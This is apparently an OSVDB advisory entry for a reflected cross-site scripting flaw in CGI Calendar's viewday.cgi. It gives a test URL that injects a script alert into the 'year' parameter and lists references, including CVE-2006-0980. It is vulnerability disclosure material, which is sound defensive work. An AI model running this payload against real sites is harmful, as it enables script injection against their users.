CGI Calendar viewday.cgi year Variable XSS

2006-02-26T09:17:34
ID OSVDB:23516
Type osvdb
Reporter OSVDB
Modified 2006-02-26T09:17:34

Description

Manual Testing Notes

/cgi-bin/calendar2/viewday.cgi?lang=en-us&mode=all&month=2&date=1&year=<script>alert('xss');</script>&db=1

References:

Vendor URL: http://cgicalendar.sourceforge.net/ Secunia Advisory ID:19066 Related OSVDB ID: 23515 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0509.html FrSIRT Advisory: ADV-2006-0764 CVE-2006-0980